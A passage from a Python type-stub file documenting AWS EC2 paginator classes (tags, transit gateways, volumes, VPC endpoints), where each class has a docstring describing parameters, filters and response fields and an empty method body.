        :param PaginationConfig: A dictionary that provides parameters to
            control pagination: ``MaxItems`` (integer, total number of items to
            return before a ``NextToken`` is emitted), ``PageSize`` (integer,
            size of each page) and ``StartingToken`` (string, the ``NextToken``
            from a previous response).
        :rtype: dict
        :returns: Each page contains ``StaleSecurityGroupSet``, a list of dicts
            describing stale security groups. Each entry carries ``GroupId``,
            ``GroupName``, ``Description``, ``VpcId`` and two rule lists,
            ``StaleIpPermissions`` (inbound) and ``StaleIpPermissionsEgress``
            (outbound). A stale rule holds ``FromPort``/``ToPort`` (integers;
            ``-1`` means all ICMP types), ``IpProtocol``, ``IpRanges``,
            ``PrefixListIds`` and ``UserIdGroupPairs`` — security-group/account
            pairs with ``GroupId``, ``GroupName``, ``Description``, ``UserId``,
            ``VpcId``, ``PeeringStatus`` and ``VpcPeeringConnectionId``.
        """
        pass
class DescribeTags(Paginator):
    def paginate(self, DryRun: bool = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Paginate over the results of :py:meth:`EC2.Client.describe_tags`.

        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeTags>`_

        :type DryRun: boolean
        :param DryRun: Checks whether you have the required permissions for the
            action without actually making the request. With the required
            permissions the error response is ``DryRunOperation``; otherwise it
            is ``UnauthorizedOperation``.
        :type Filters: list
        :param Filters: The filters, each a dict with a case-sensitive ``Name``
            (string) and ``Values`` (list of strings). Supported filter names:
            ``key`` (the tag key), ``resource-id`` (the ID of the resource),
            ``resource-type`` (e.g. ``customer-gateway`` | ``dedicated-host`` |
            ``dhcp-options`` | ``elastic-ip`` | ``fleet`` | ``fpga-image`` |
            ``image`` | ``instance`` | ``host-reservation`` |
            ``internet-gateway`` | ``launch-template`` | ``natgateway`` |
            ``network-acl`` | ``network-interface`` | ``reserved-instances`` |
            ``route-table`` | ``security-group`` | ``snapshot`` |
            ``spot-instances-request`` | ``subnet`` | ``volume`` | ``vpc`` |
            ``vpc-peering-connection`` | ``vpn-connection`` | ``vpn-gateway``),
            ``tag``:<key> (the key/value combination of the tag, e.g.
            \"tag:Owner\" with value \"TeamA\" matches \"Owner=TeamA\"), and
            ``value`` (the tag value).
        :type PaginationConfig: dict
        :param PaginationConfig: A dictionary that provides parameters to
            control pagination: ``MaxItems`` (integer, total number of items to
            return before a ``NextToken`` is emitted), ``PageSize`` (integer,
            size of each page) and ``StartingToken`` (string, the ``NextToken``
            from a previous response).
        :rtype: dict
        :returns: Each page contains ``Tags``, a list of dicts, one per tag,
            with ``Key`` (the tag key), ``Value`` (the tag value),
            ``ResourceId`` (the ID of the resource) and ``ResourceType`` (the
            resource type, one of the enumerated type strings).
        """
        pass
class DescribeTransitGatewayAttachments(Paginator):
    def paginate(self, TransitGatewayAttachmentIds: List = None, Filters: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
        """
        Paginate over the results of :py:meth:`EC2.Client.describe_transit_gateway_attachments`.

        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeTransitGatewayAttachments>`_

        :type TransitGatewayAttachmentIds: list
        :param TransitGatewayAttachmentIds: The IDs of the attachments (list of
            strings).
        :type Filters: list
        :param Filters: One or more filters, each a dict with a case-sensitive
            ``Name`` (string) and ``Values`` (list of strings). Supported
            filter names: ``association.state`` (``associating`` |
            ``associated`` | ``disassociating``),
            ``association.transit-gateway-route-table-id``, ``resource-id``,
            ``resource-owner-id``, ``resource-type`` (``vpc`` | ``vpn``),
            ``state`` (``available`` | ``deleted`` | ``deleting`` | ``failed``
            | ``modifying`` | ``pendingAcceptance`` | ``pending`` |
            ``rollingBack`` | ``rejected`` | ``rejecting``),
            ``transit-gateway-attachment-id``, ``transit-gateway-id`` and
            ``transit-gateway-owner-id``.
        :type DryRun: boolean
        :param DryRun: Checks whether you have the required permissions for the
            action without actually making the request. With the required
            permissions the error response is ``DryRunOperation``; otherwise it
            is ``UnauthorizedOperation``.
        :type PaginationConfig: dict
        :param PaginationConfig: A dictionary that provides parameters to
            control pagination: ``MaxItems`` (integer, total number of items to
            return before a ``NextToken`` is emitted), ``PageSize`` (integer,
            size of each page) and ``StartingToken`` (string, the ``NextToken``
            from a previous response).
        :rtype: dict
        :returns: Each page contains ``TransitGatewayAttachments``, a list of
            dicts describing attachments between a resource and a transit
            gateway: ``TransitGatewayAttachmentId``, ``TransitGatewayId``,
            ``TransitGatewayOwnerId``, ``ResourceOwnerId``, ``ResourceType``
            (``vpc`` | ``vpn``), ``ResourceId``, ``State``, ``Association``
            (dict with ``TransitGatewayRouteTableId`` and ``State``),
            ``CreationTime`` (datetime) and ``Tags`` (list of ``Key``/``Value``
            dicts; keys accept up to 127 Unicode characters and may not begin
            with ``aws:``, values up to 255 Unicode characters, both
            case-sensitive).
        """
        pass
class DescribeTransitGatewayRouteTables(Paginator):
    def paginate(self, TransitGatewayRouteTableIds: List = None, Filters: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
        """
        Paginate over the results of :py:meth:`EC2.Client.describe_transit_gateway_route_tables`.

        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeTransitGatewayRouteTables>`_

        :type TransitGatewayRouteTableIds: list
        :param TransitGatewayRouteTableIds: The IDs of the transit gateway
            route tables (list of strings).
        :type Filters: list
        :param Filters: One or more filters, each a dict with a case-sensitive
            ``Name`` (string) and ``Values`` (list of strings). Supported
            filter names: ``default-association-route-table`` (``true`` |
            ``false``), ``default-propagation-route-table`` (``true`` |
            ``false``), ``state`` (``available`` | ``deleted`` | ``deleting`` |
            ``failed`` | ``modifying`` | ``pendingAcceptance`` | ``pending`` |
            ``rollingBack`` | ``rejected`` | ``rejecting``),
            ``transit-gateway-id`` and ``transit-gateway-route-table-id``.
        :type DryRun: boolean
        :param DryRun: Checks whether you have the required permissions for the
            action without actually making the request. With the required
            permissions the error response is ``DryRunOperation``; otherwise it
            is ``UnauthorizedOperation``.
        :type PaginationConfig: dict
        :param PaginationConfig: A dictionary that provides parameters to
            control pagination: ``MaxItems`` (integer, total number of items to
            return before a ``NextToken`` is emitted), ``PageSize`` (integer,
            size of each page) and ``StartingToken`` (string, the ``NextToken``
            from a previous response).
        :rtype: dict
        :returns: Each page contains ``TransitGatewayRouteTables``, a list of
            dicts, one per route table: ``TransitGatewayRouteTableId``,
            ``TransitGatewayId``, ``State`` (``pending`` | ``available`` |
            ``deleting`` | ``deleted``), ``DefaultAssociationRouteTable`` and
            ``DefaultPropagationRouteTable`` (booleans flagging the transit
            gateway's default tables), ``CreationTime`` (datetime) and ``Tags``
            (list of ``Key``/``Value`` dicts; keys accept up to 127 Unicode
            characters and may not begin with ``aws:``, values up to 255
            Unicode characters, both case-sensitive).
        """
        pass
class DescribeTransitGatewayVpcAttachments(Paginator):
    def paginate(self, TransitGatewayAttachmentIds: List = None, Filters: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
        """
        Paginate over the results of :py:meth:`EC2.Client.describe_transit_gateway_vpc_attachments`.

        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeTransitGatewayVpcAttachments>`_

        :type TransitGatewayAttachmentIds: list
        :param TransitGatewayAttachmentIds: The IDs of the attachments (list of
            strings).
        :type Filters: list
        :param Filters: One or more filters, each a dict with a case-sensitive
            ``Name`` (string) and ``Values`` (list of strings). Supported
            filter names: ``state`` (``available`` | ``deleted`` | ``deleting``
            | ``failed`` | ``modifying`` | ``pendingAcceptance`` | ``pending``
            | ``rollingBack`` | ``rejected`` | ``rejecting``),
            ``transit-gateway-attachment-id``, ``transit-gateway-id`` and
            ``vpc-id``.
        :type DryRun: boolean
        :param DryRun: Checks whether you have the required permissions for the
            action without actually making the request. With the required
            permissions the error response is ``DryRunOperation``; otherwise it
            is ``UnauthorizedOperation``.
        :type PaginationConfig: dict
        :param PaginationConfig: A dictionary that provides parameters to
            control pagination: ``MaxItems`` (integer, total number of items to
            return before a ``NextToken`` is emitted), ``PageSize`` (integer,
            size of each page) and ``StartingToken`` (string, the ``NextToken``
            from a previous response).
        :rtype: dict
        :returns: Each page contains ``TransitGatewayVpcAttachments``, a list
            of dicts, one per VPC attachment: ``TransitGatewayAttachmentId``,
            ``TransitGatewayId``, ``VpcId``, ``VpcOwnerId``, ``State``,
            ``SubnetIds`` (list of strings), ``CreationTime`` (datetime),
            ``Options`` (dict with ``DnsSupport`` and ``Ipv6Support``, each
            ``enable`` | ``disable``) and ``Tags`` (list of ``Key``/``Value``
            dicts; keys accept up to 127 Unicode characters and may not begin
            with ``aws:``, values up to 255 Unicode characters, both
            case-sensitive).
        """
        pass
class DescribeTransitGateways(Paginator):
    def paginate(self, TransitGatewayIds: List = None, Filters: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
        """
        Paginate over the results of :py:meth:`EC2.Client.describe_transit_gateways`.

        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeTransitGateways>`_

        :type TransitGatewayIds: list
        :param TransitGatewayIds: The IDs of the transit gateways (list of
            strings).
        :type Filters: list
        :param Filters: One or more filters, each a dict with a case-sensitive
            ``Name`` (string) and ``Values`` (list of strings). Supported
            filter names: ``options.propagation-default-route-table-id``,
            ``options.amazon-side-asn``,
            ``options.association-default-route-table-id``,
            ``options.auto-accept-shared-attachments`` (``enable`` |
            ``disable``), ``options.default-route-table-association``
            (``enable`` | ``disable``),
            ``options.default-route-table-propagation`` (``enable`` |
            ``disable``), ``options.dns-support`` (``enable`` | ``disable``),
            ``options.vpn-ecmp-support`` (``enable`` | ``disable``),
            ``owner-id``, ``state`` (``available`` | ``deleted`` | ``deleting``
            | ``failed`` | ``modifying`` | ``pendingAcceptance`` | ``pending``
            | ``rollingBack`` | ``rejected`` | ``rejecting``) and
            ``transit-gateway-id``.
        :type DryRun: boolean
        :param DryRun: Checks whether you have the required permissions for the
            action without actually making the request. With the required
            permissions the error response is ``DryRunOperation``; otherwise it
            is ``UnauthorizedOperation``.
        :type PaginationConfig: dict
        :param PaginationConfig: A dictionary that provides parameters to
            control pagination: ``MaxItems`` (integer, total number of items to
            return before a ``NextToken`` is emitted), ``PageSize`` (integer,
            size of each page) and ``StartingToken`` (string, the ``NextToken``
            from a previous response).
        :rtype: dict
        :returns: Each page contains ``TransitGateways``, a list of dicts, one
            per transit gateway: ``TransitGatewayId``, ``TransitGatewayArn``,
            ``State`` (``pending`` | ``available`` | ``modifying`` |
            ``deleting`` | ``deleted``), ``OwnerId``, ``Description``,
            ``CreationTime`` (datetime), ``Options`` (dict with
            ``AmazonSideAsn`` — a private ASN in 64512-65534 for 16-bit or
            4200000000-4294967294 for 32-bit —
            ``AutoAcceptSharedAttachments``, ``DefaultRouteTableAssociation``,
            ``AssociationDefaultRouteTableId``,
            ``DefaultRouteTablePropagation``,
            ``PropagationDefaultRouteTableId``, ``VpnEcmpSupport`` and
            ``DnsSupport``) and ``Tags`` (list of ``Key``/``Value`` dicts; keys
            accept up to 127 Unicode characters and may not begin with
            ``aws:``, values up to 255 Unicode characters, both
            case-sensitive).
        """
        pass
class DescribeVolumeStatus(Paginator):
    def paginate(self, Filters: List = None, VolumeIds: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
        """
        Paginate the results of :py:meth:`EC2.Client.describe_volume_status`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeVolumeStatus>`_

        Each page of the response contains a ``VolumeStatuses`` list; every entry
        describes one volume's ``AvailabilityZone``, ``VolumeId``, overall
        ``VolumeStatus`` (``ok`` | ``impaired`` | ``insufficient-data`` plus
        per-check ``Details``), pending ``Actions`` (e.g. ``enable-volume-io``),
        and scheduled ``Events`` with ``NotBefore``/``NotAfter`` timestamps.

        :type Filters: list
        :param Filters:
            Each filter is a dict with ``Name`` (string) and ``Values`` (list of
            strings); names and values are case-sensitive. Supported names include
            ``action.code``, ``action.description``, ``action.event-id``,
            ``availability-zone``, ``event.description``, ``event.event-id``,
            ``event.event-type``, ``event.not-after``, ``event.not-before``,
            ``volume-status.details-name``, ``volume-status.details-status``, and
            ``volume-status.status``.
        :type VolumeIds: list
        :param VolumeIds:
            The IDs of the volumes. By default all of your volumes are described.
        :type DryRun: boolean
        :param DryRun:
            Checks whether you have the required permissions for the action,
            without actually making the request. With permissions the error
            response is ``DryRunOperation``; otherwise ``UnauthorizedOperation``.
        :type PaginationConfig: dict
        :param PaginationConfig:
            Pagination controls: ``MaxItems`` (total items to return; a
            ``NextToken`` is provided when more are available), ``PageSize``
            (items per page), and ``StartingToken`` (the ``NextToken`` from a
            previous response).
        :rtype: dict
        :returns:
        """
        pass
class DescribeVolumes(Paginator):
    def paginate(self, Filters: List = None, VolumeIds: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
        """
        Paginate the results of :py:meth:`EC2.Client.describe_volumes`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeVolumes>`_

        Each page contains a ``Volumes`` list. Every volume entry includes its
        ``Attachments`` (attach time, device, instance ID, attachment state,
        ``DeleteOnTermination`` flag), ``AvailabilityZone``, ``CreateTime``,
        ``Encrypted`` flag and ``KmsKeyId``, ``Size`` in GiB, ``SnapshotId``,
        ``State`` (``creating`` | ``available`` | ``in-use`` | ``deleting`` |
        ``deleted`` | ``error``), ``VolumeId``, ``Iops``, ``Tags``, and
        ``VolumeType`` (``standard`` | ``io1`` | ``gp2`` | ``sc1`` | ``st1``).

        :type Filters: list
        :param Filters:
            Each filter is a dict with ``Name`` (string) and ``Values`` (list of
            strings); names and values are case-sensitive. Supported names include
            ``attachment.attach-time``, ``attachment.delete-on-termination``,
            ``attachment.device``, ``attachment.instance-id``,
            ``attachment.status``, ``availability-zone``, ``create-time``,
            ``encrypted``, ``size``, ``snapshot-id``, ``status``, ``tag:<key>``,
            ``tag-key``, ``volume-id``, and ``volume-type``.
        :type VolumeIds: list
        :param VolumeIds:
            The volume IDs.
        :type DryRun: boolean
        :param DryRun:
            Checks whether you have the required permissions for the action,
            without actually making the request. With permissions the error
            response is ``DryRunOperation``; otherwise ``UnauthorizedOperation``.
        :type PaginationConfig: dict
        :param PaginationConfig:
            Pagination controls: ``MaxItems`` (total items to return; a
            ``NextToken`` is provided when more are available), ``PageSize``
            (items per page), and ``StartingToken`` (the ``NextToken`` from a
            previous response).
        :rtype: dict
        :returns:
        """
        pass
class DescribeVolumesModifications(Paginator):
    def paginate(self, DryRun: bool = None, VolumeIds: List = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Paginate the results of :py:meth:`EC2.Client.describe_volumes_modifications`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeVolumesModifications>`_

        Each page contains a ``VolumesModifications`` list. Every entry reports
        one EBS volume's modification status: ``VolumeId``, ``ModificationState``
        (``modifying`` | ``optimizing`` | ``completed`` | ``failed``; null for
        unmodified volumes), ``StatusMessage``, target and original ``Size``,
        ``Iops``, and ``VolumeType``, ``Progress`` (0-100 percent), and the
        ``StartTime``/``EndTime`` of the modification.

        :type DryRun: boolean
        :param DryRun:
            Checks whether you have the required permissions for the action,
            without actually making the request. With permissions the error
            response is ``DryRunOperation``; otherwise ``UnauthorizedOperation``.
        :type VolumeIds: list
        :param VolumeIds:
            The IDs of the volumes for which in-progress modifications will be
            described.
        :type Filters: list
        :param Filters:
            Each filter is a dict with ``Name`` (string) and ``Values`` (list of
            strings); names and values are case-sensitive. Supported names:
            ``volume-id``, ``modification-state``, ``target-size``,
            ``target-iops``, ``target-volume-type``, ``original-size``,
            ``original-iops``, ``original-volume-type``, ``start-time``.
        :type PaginationConfig: dict
        :param PaginationConfig:
            Pagination controls: ``MaxItems`` (total items to return; a
            ``NextToken`` is provided when more are available), ``PageSize``
            (items per page), and ``StartingToken`` (the ``NextToken`` from a
            previous response).
        :rtype: dict
        :returns:
        """
        pass
class DescribeVpcClassicLinkDnsSupport(Paginator):
    def paginate(self, VpcIds: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Paginate the results of :py:meth:`EC2.Client.describe_vpc_classic_link_dns_support`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeVpcClassicLinkDnsSupport>`_

        Each page contains a ``Vpcs`` list; every entry pairs a ``VpcId`` with a
        ``ClassicLinkDnsSupported`` boolean indicating whether ClassicLink DNS
        support is enabled for that VPC.

        :type VpcIds: list
        :param VpcIds:
            One or more VPC IDs.
        :type PaginationConfig: dict
        :param PaginationConfig:
            Pagination controls: ``MaxItems`` (total items to return; a
            ``NextToken`` is provided when more are available), ``PageSize``
            (items per page), and ``StartingToken`` (the ``NextToken`` from a
            previous response).
        :rtype: dict
        :returns:
        """
        pass
class DescribeVpcEndpointConnectionNotifications(Paginator):
    def paginate(self, DryRun: bool = None, ConnectionNotificationId: str = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Paginate the results of :py:meth:`EC2.Client.describe_vpc_endpoint_connection_notifications`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeVpcEndpointConnectionNotifications>`_

        Each page contains a ``ConnectionNotificationSet`` list. Every entry
        describes one VPC endpoint / endpoint-service notification: its
        ``ConnectionNotificationId``, ``ServiceId``, ``VpcEndpointId``,
        ``ConnectionNotificationType`` (``Topic``), the SNS topic
        ``ConnectionNotificationArn``, the subscribed ``ConnectionEvents``
        (``Accept``, ``Connect``, ``Delete``, ``Reject``), and its
        ``ConnectionNotificationState`` (``Enabled`` | ``Disabled``).

        :type DryRun: boolean
        :param DryRun:
            Checks whether you have the required permissions for the action,
            without actually making the request. With permissions the error
            response is ``DryRunOperation``; otherwise ``UnauthorizedOperation``.
        :type ConnectionNotificationId: string
        :param ConnectionNotificationId:
            The ID of the notification.
        :type Filters: list
        :param Filters:
            Each filter is a dict with ``Name`` (string) and ``Values`` (list of
            strings); names and values are case-sensitive. Supported names:
            ``connection-notification-arn``, ``connection-notification-id``,
            ``connection-notification-state``, ``connection-notification-type``,
            ``service-id``, ``vpc-endpoint-id``.
        :type PaginationConfig: dict
        :param PaginationConfig:
            Pagination controls: ``MaxItems`` (total items to return; a
            ``NextToken`` is provided when more are available), ``PageSize``
            (items per page), and ``StartingToken`` (the ``NextToken`` from a
            previous response).
        :rtype: dict
        :returns:
        """
        pass
class DescribeVpcEndpointConnections(Paginator):
    def paginate(self, DryRun: bool = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Paginate the results of :py:meth:`EC2.Client.describe_vpc_endpoint_connections`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeVpcEndpointConnections>`_

        Each page contains a ``VpcEndpointConnections`` list. Every entry
        describes one endpoint connection to a service: ``ServiceId``,
        ``VpcEndpointId``, the endpoint owner's account (``VpcEndpointOwner``),
        the ``VpcEndpointState`` (``PendingAcceptance`` | ``Pending`` |
        ``Available`` | ``Deleting`` | ``Deleted`` | ``Rejected`` | ``Failed`` |
        ``Expired``), and the ``CreationTimestamp``.

        :type DryRun: boolean
        :param DryRun:
            Checks whether you have the required permissions for the action,
            without actually making the request. With permissions the error
            response is ``DryRunOperation``; otherwise ``UnauthorizedOperation``.
        :type Filters: list
        :param Filters:
            Each filter is a dict with ``Name`` (string) and ``Values`` (list of
            strings); names and values are case-sensitive. Supported names:
            ``service-id``, ``vpc-endpoint-owner``, ``vpc-endpoint-state``
            (``pendingAcceptance`` | ``pending`` | ``available`` | ``deleting`` |
            ``deleted`` | ``rejected`` | ``failed``), ``vpc-endpoint-id``.
        :type PaginationConfig: dict
        :param PaginationConfig:
            Pagination controls: ``MaxItems`` (total items to return; a
            ``NextToken`` is provided when more are available), ``PageSize``
            (items per page), and ``StartingToken`` (the ``NextToken`` from a
            previous response).
        :rtype: dict
        :returns:
        """
        pass
class DescribeVpcEndpointServiceConfigurations(Paginator):
    def paginate(self, DryRun: bool = None, ServiceIds: List = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Paginate the results of :py:meth:`EC2.Client.describe_vpc_endpoint_service_configurations`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeVpcEndpointServiceConfigurations>`_

        Each page contains a ``ServiceConfigurations`` list. Every entry
        describes one endpoint service: its ``ServiceType`` (``Interface`` |
        ``Gateway``), ``ServiceId``, ``ServiceName``, ``ServiceState``
        (``Pending`` | ``Available`` | ``Deleting`` | ``Deleted`` | ``Failed``),
        the ``AvailabilityZones`` where it is available, the
        ``AcceptanceRequired`` and ``ManagesVpcEndpoints`` flags, the
        ``NetworkLoadBalancerArns`` backing it, its ``BaseEndpointDnsNames``, and
        its ``PrivateDnsName``.

        :type DryRun: boolean
        :param DryRun:
            Checks whether you have the required permissions for the action,
            without actually making the request. With permissions the error
            response is ``DryRunOperation``; otherwise ``UnauthorizedOperation``.
        :type ServiceIds: list
        :param ServiceIds:
            The IDs of one or more services.
        :type Filters: list
        :param Filters:
            Each filter is a dict with ``Name`` (string) and ``Values`` (list of
            strings); names and values are case-sensitive. Supported names:
            ``service-name``, ``service-id``, ``service-state`` (``Pending`` |
            ``Available`` | ``Deleting`` | ``Deleted`` | ``Failed``).
        :type PaginationConfig: dict
        :param PaginationConfig:
            Pagination controls: ``MaxItems`` (total items to return; a
            ``NextToken`` is provided when more are available), ``PageSize``
            (items per page), and ``StartingToken`` (the ``NextToken`` from a
            previous response).
        :rtype: dict
        :returns:
        """
        pass
class DescribeVpcEndpointServicePermissions(Paginator):
    def paginate(self, ServiceId: str, DryRun: bool = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Paginate the results of :py:meth:`EC2.Client.describe_vpc_endpoint_service_permissions`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeVpcEndpointServicePermissions>`_

        Each page contains an ``AllowedPrincipals`` list; every entry pairs a
        ``PrincipalType`` (``All`` | ``Service`` | ``OrganizationUnit`` |
        ``Account`` | ``User`` | ``Role``) with the principal's ARN
        (``Principal``).

        :type ServiceId: string
        :param ServiceId: **[REQUIRED]**
            The ID of the service.
        :type DryRun: boolean
        :param DryRun:
            Checks whether you have the required permissions for the action,
            without actually making the request. With permissions the error
            response is ``DryRunOperation``; otherwise ``UnauthorizedOperation``.
        :type Filters: list
        :param Filters:
            Each filter is a dict with ``Name`` (string) and ``Values`` (list of
            strings); names and values are case-sensitive. Supported names:
            ``principal`` (the ARN of the principal), ``principal-type``
            (``All`` | ``Service`` | ``OrganizationUnit`` | ``Account`` |
            ``User`` | ``Role``).
        :type PaginationConfig: dict
        :param PaginationConfig:
            Pagination controls: ``MaxItems`` (total items to return; a
            ``NextToken`` is provided when more are available), ``PageSize``
            (items per page), and ``StartingToken`` (the ``NextToken`` from a
            previous response).
        :rtype: dict
        :returns:
        """
        pass
class DescribeVpcEndpointServices(Paginator):
    def paginate(self, DryRun: bool = None, ServiceNames: List = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_vpc_endpoint_services`.
        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeVpcEndpointServices>`_
        **Request Syntax**
        ::
          response_iterator = paginator.paginate(
              DryRun=True|False,
              ServiceNames=[
                  'string',
              ],
              Filters=[
                  {
                      'Name': 'string',
                      'Values': [
                          'string',
                      ]
                  },
              ],
              PaginationConfig={
                  'MaxItems': 123,
                  'PageSize': 123,
                  'StartingToken': 'string'
              }
          )
        **Response Syntax**
        ::
            {
                'ServiceNames': [
                    'string',
                ],
                'ServiceDetails': [
                    {
                        'ServiceName': 'string',
                        'ServiceType': [
                            {
                                'ServiceType': 'Interface'|'Gateway'
                            },
                        ],
                        'AvailabilityZones': [
                            'string',
                        ],
                        'Owner': 'string',
                        'BaseEndpointDnsNames': [
                            'string',
                        ],
                        'PrivateDnsName': 'string',
                        'VpcEndpointPolicySupported': True|False,
                        'AcceptanceRequired': True|False,
                        'ManagesVpcEndpoints': True|False
                    },
                ],
            }
        **Response Structure**
        - *(dict) --*
          Contains the output of DescribeVpcEndpointServices.
          - **ServiceNames** *(list) --*
            A list of supported services.
            - *(string) --*
          - **ServiceDetails** *(list) --*
            Information about the service.
            - *(dict) --*
              Describes a VPC endpoint service.
              - **ServiceName** *(string) --*
                The Amazon Resource Name (ARN) of the service.
              - **ServiceType** *(list) --*
                The type of service.
                - *(dict) --*
                  Describes the type of service for a VPC endpoint.
                  - **ServiceType** *(string) --*
                    The type of service.
              - **AvailabilityZones** *(list) --*
                The Availability Zones in which the service is available.
                - *(string) --*
              - **Owner** *(string) --*
                The AWS account ID of the service owner.
              - **BaseEndpointDnsNames** *(list) --*
                The DNS names for the service.
                - *(string) --*
              - **PrivateDnsName** *(string) --*
                The private DNS name for the service.
              - **VpcEndpointPolicySupported** *(boolean) --*
                Indicates whether the service supports endpoint policies.
              - **AcceptanceRequired** *(boolean) --*
                Indicates whether VPC endpoint connection requests to the service must be accepted by the service owner.
              - **ManagesVpcEndpoints** *(boolean) --*
                Indicates whether the service manages its VPC endpoints. Management of the service VPC endpoints using the VPC endpoint API is restricted.
        :type DryRun: boolean
        :param DryRun:
          Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
        :type ServiceNames: list
        :param ServiceNames:
          One or more service names.
          - *(string) --*
        :type Filters: list
        :param Filters:
          One or more filters.
          * ``service-name`` : The name of the service.
          - *(dict) --*
            A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
            * DescribeAvailabilityZones
            * DescribeImages
            * DescribeInstances
            * DescribeKeyPairs
            * DescribeSecurityGroups
            * DescribeSnapshots
            * DescribeSubnets
            * DescribeTags
            * DescribeVolumes
            * DescribeVpcs
            - **Name** *(string) --*
              The name of the filter. Filter names are case-sensitive.
            - **Values** *(list) --*
              The filter values. Filter values are case-sensitive.
              - *(string) --*
        :type PaginationConfig: dict
        :param PaginationConfig:
          A dictionary that provides parameters to control pagination.
          - **MaxItems** *(integer) --*
            The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
          - **PageSize** *(integer) --*
            The size of each page.
          - **StartingToken** *(string) --*
            A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass  # documentation stub — presumably the real paginator is supplied by botocore at runtime; TODO confirm
class DescribeVpcEndpoints(Paginator):
    def paginate(self, DryRun: bool = None, VpcEndpointIds: List = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_vpc_endpoints`.
        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeVpcEndpoints>`_
        **Request Syntax**
        ::
          response_iterator = paginator.paginate(
              DryRun=True|False,
              VpcEndpointIds=[
                  'string',
              ],
              Filters=[
                  {
                      'Name': 'string',
                      'Values': [
                          'string',
                      ]
                  },
              ],
              PaginationConfig={
                  'MaxItems': 123,
                  'PageSize': 123,
                  'StartingToken': 'string'
              }
          )
        **Response Syntax**
        ::
            {
                'VpcEndpoints': [
                    {
                        'VpcEndpointId': 'string',
                        'VpcEndpointType': 'Interface'|'Gateway',
                        'VpcId': 'string',
                        'ServiceName': 'string',
                        'State': 'PendingAcceptance'|'Pending'|'Available'|'Deleting'|'Deleted'|'Rejected'|'Failed'|'Expired',
                        'PolicyDocument': 'string',
                        'RouteTableIds': [
                            'string',
                        ],
                        'SubnetIds': [
                            'string',
                        ],
                        'Groups': [
                            {
                                'GroupId': 'string',
                                'GroupName': 'string'
                            },
                        ],
                        'PrivateDnsEnabled': True|False,
                        'RequesterManaged': True|False,
                        'NetworkInterfaceIds': [
                            'string',
                        ],
                        'DnsEntries': [
                            {
                                'DnsName': 'string',
                                'HostedZoneId': 'string'
                            },
                        ],
                        'CreationTimestamp': datetime(2015, 1, 1)
                    },
                ],
            }
        **Response Structure**
        - *(dict) --*
          Contains the output of DescribeVpcEndpoints.
          - **VpcEndpoints** *(list) --*
            Information about the endpoints.
            - *(dict) --*
              Describes a VPC endpoint.
              - **VpcEndpointId** *(string) --*
                The ID of the VPC endpoint.
              - **VpcEndpointType** *(string) --*
                The type of endpoint.
              - **VpcId** *(string) --*
                The ID of the VPC to which the endpoint is associated.
              - **ServiceName** *(string) --*
                The name of the service to which the endpoint is associated.
              - **State** *(string) --*
                The state of the VPC endpoint.
              - **PolicyDocument** *(string) --*
                The policy document associated with the endpoint, if applicable.
              - **RouteTableIds** *(list) --*
                (Gateway endpoint) One or more route tables associated with the endpoint.
                - *(string) --*
              - **SubnetIds** *(list) --*
                (Interface endpoint) One or more subnets in which the endpoint is located.
                - *(string) --*
              - **Groups** *(list) --*
                (Interface endpoint) Information about the security groups associated with the network interface.
                - *(dict) --*
                  Describes a security group.
                  - **GroupId** *(string) --*
                    The ID of the security group.
                  - **GroupName** *(string) --*
                    The name of the security group.
              - **PrivateDnsEnabled** *(boolean) --*
                (Interface endpoint) Indicates whether the VPC is associated with a private hosted zone.
              - **RequesterManaged** *(boolean) --*
